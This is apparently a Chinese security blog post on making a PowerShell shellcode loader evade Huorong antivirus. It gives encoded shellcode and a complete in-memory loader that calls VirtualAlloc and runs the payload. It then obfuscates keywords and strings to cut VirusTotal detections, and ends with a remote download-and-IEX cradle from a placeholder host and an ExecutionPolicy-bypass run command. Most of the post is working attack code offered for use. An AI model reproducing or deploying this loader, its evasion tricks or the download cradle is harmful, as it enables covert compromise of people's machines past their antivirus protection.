Powershell 过火绒免杀上线

payload生成

在这里插入图片描述
在这里插入图片描述
原生payload生成后被无情秒杀

powershell免杀制作

打开powershell命令行,将payload编码

1.新建一个变量h,用来接收之后编码的payload

$h= ''

2.把FromBase64String放入变量$k中

$k=[System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjIsajcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMYnZQcCPQsabgviut5qEtwnqLM1P/WSmYY5NZ+Ma6Y4+wqy6x8QlB6kAXrlVxdwM7y5/QSk93lTBKsMuOZBMABwpAHF6YvI3ZQRlEOYkRGTVcZA25MWUpPT0IMFg0TAwtATE5TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3RsdBUXGAN3UUpHRk1XDBYNEwouKSMlEFzT6YeXw5abnZPfOiCfborrWnU/5BV7rollSoNrdYUP83wmPVcls5fvZykXV1cuZ/e2pk+A7+8bvQhRtiN+5fSMlld5T0oY5xRuqig/6FG2/MfQyb7Le75dhB+2sacVvXE0uTZza6YyXLzIx9Qoif5Po3wt1ysaEcSbIduXlWs3RlXJ7nGnP+69r3Uxc++P7iSHhLe0GHLELb1v03jRzRbOUfmLnGhepaXV7XmN8sHiWlWFM4Ak6V4XBlQ8V51f9d5wp0fwBfyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEhMXDRERFg0SFhANERcbIzEXdVs=')

3.利用循环每次加个’,',并且把编码后的数据转换成一行

$k | foreach {$h=$h+$_.ToString()+','}

4.输出编码后的payload

$h

在这里插入图片描述
整合为ps1脚本更方便

$h= ''
$k=[System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSBycktzKCMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMYnZQcCPQBCEOnRtGWA9JPbgviut5qEtwnqLM1P/WSmYY5NZ+Ma6Y4+wqy6x8QlB6kAXrlVxdwM7y5/QSk93lTBKsMuOZBMABwpAHF6YvI35TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3RsdBUXGAN3UUpHRk1XDBYNEwouKSMlEFzT6YeXw5abnZPfOiCfborrWnU/5BV7rollSoNrdYUP83wmPVcls5fvZykXV1cuZ/e2pk+A7+8bvQhRtiN+5fSMlld5T0oY5xRuqig/6FG2/MfQyb7Le75dhB+2LT1KZD3+zcVvXE0uTZza6YyXLzIx9Qoif5Po3wt1y9hGg6LydpPI6DLJC9REcSbIduXlWs3RlXJ7nGnP+69r3Uxc++P7iSHhLe0GHLELb1v03jRzRbOUfmLnGhepaXV7XmN8sHiWlWFM4Ak6V4XBlQ8V51f9d5wp0fwBfyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEhMXDRERFg0SFhANERcbIzEXdVs=')
$k | foreach {$h=$h+$_.ToString()+','}
$h

在这里插入图片描述

然后将编码得到的数据复制替换payload即可,注意去掉最后一个逗号”,“。

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,98,118,80,112,35,208,4,33,14,157,27,70,88,15,73,61,184,47,138,235,121,168,75,112,158,162,204,212,255,214,74,102,24,228,214,126,49,174,152,227,236,42,203,172,124,66,80,122,144,5,235,149,92,93,192,206,242,231,244,18,147,221,229,76,18,172,50,227,153,4,192,1,194,144,7,23,166,47,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,26,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,10,46,41,35,37,16,92,211,233,135,151,195,150,155,157,147,223,58,32,159,110,138,235,90,117,63,228,21,123,174,137,101,74,131,107,117,133,15,243,124,38,61,87,37,179,151,239,103,41,23,87,87,46,103,247,182,166,79,128,239,239,27,189,8,81,182,35,126,229,244,140,150,87,121,79,74,24,231,20,110,170,40,63,232,81,182,252,199,208,201,190,203,123,190,93,132,31,182,45,61,74,100,61,254,205,197,111,92,77,46,77,156,218,233,140,151,47,50,49,245,10,34,127,147,232,223,11,117,203,216,70,131,162,242,118,147,200,232,50,201,11,212,68,113,38,200,118,229,229,90,205,209,149,114,123,156,105,207,251,175,107,221,76,92,251,227,251,137,33,225,45,237,6,28,177,11,111,91,244,222,52,115,69,179,148,126,98,231,26,23,169,105,117,123,94,99,124,176,120,150,149,97,76,224,9,58,87,133,193,149,15,21,231,87,253,119,156,41,209,252,1,127,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,23,13,17,17,22,13,18,22,16,13,17,23,27,35,49,23,117,91)

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

火绒免杀
在这里插入图片描述
VT检查杀率(60/13),还需要继续改造
在这里插入图片描述
修改关键字,规避静态特征查杀,时间问题只修改了小部分

IEX $DoIt -- i`ex $DoIt
IEX $a  --  ie`x $a
$var_runme -- $vrunme
$var_buffer -- $vbuffer
func_get_proc_address --  func_k
func_get_delegate_type -- func_l
$var_type_builder -- $vk
$var_parameters -- $vp
$var_return_type-- $ve
$var_procedure -- $v_pro

建议使用工具直接替换
在这里插入图片描述

到这里,查杀率60/5,还需要再改改
在这里插入图片描述

最终payload

Set-StrictMode -Version 2

$DoIt = @'
function func_k {
	Param ($var_module, $v_pro)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Mic'+'rosoft.Win32.Unsa'+'feNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetPro'+'cAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetM'+'oduleH'+'andle')).Invoke($null, @($var_module)))), $v_pro))
}

function func_l {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $vp,
		[Parameter(Position = 1)] [Type] $ve = [Void]
	)

	$vk = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Refle'+'ctedDele'+'gate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMem'+'oryModule', $false).DefineType('MyDelega'+'teType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$vk.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $vp).SetImplementationFlags('Runtime, Managed')
	$vk.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $ve, $vp).SetImplementationFlags('Runtime, Managed')

	return $vk.CreateType()
}

[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,115,40,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,10,46,41,35,37,16,92,211,233,135,151,195,150,155,157,147,223,58,32,159,110,138,235,90,117,63,228,21,123,174,137,101,74,131,107,117,133,15,243,124,38,61,87,37,179,151,239,103,41,23,87,87,46,103,247,182,166,79,128,239,239,27,189,8,81,182,35,126,229,244,140,150,87,121,79,74,24,231,20,110,170,40,63,232,81,182,252,199,208,201,190,203,123,190,93,132,31,182,45,61,74,100,61,254,205,197,111,92,77,46,77,156,218,233,140,151,47,50,49,245,10,34,127,147,232,223,11,117,203,216,70,131,162,242,118,147,200,232,50,201,11,212,68,113,38,200,118,229,229,90,205,209,149,114,123,156,105,207,251,175,107,221,76,92,251,227,251,137,33,225,45,237,6,28,177,11,111,91,244,222,52,115,69,179,148,126,98,231,26,23,169,105,117,123,94,99,124,176,120,150,149,97,76,224,9,58,87,133,193,149,15,21,231,87,253,119,156,41,209,252,1,127,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,23,13,17,17,22,13,18,22,16,13,17,23,27,35,49,23,117,91)

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_k kernel32.dll VirtualAlloc), (func_l @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$vbuffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $vbuffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vbuffer, (func_l @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	i`ex $DoIt
}

在这里插入图片描述

然后使用powershell远程下载并通过IEX运行脚本得到会话权限

powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''http://xxx.com/x.ps1'')'.Replace('11','adString');IEX ($a+$b)"

或者手动执行

c:\windows\system32\xx>d:
d:\>cd D:\wwwroot\xx\xxFile
D:\wwwroot\xx\xxFile>powershell -ExecutionPolicy bypass -File ./x.ps1

在这里插入图片描述

内容浅显,没什么技术含量,不足之处欢迎师傅们指点和纠正,感激不尽。

  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值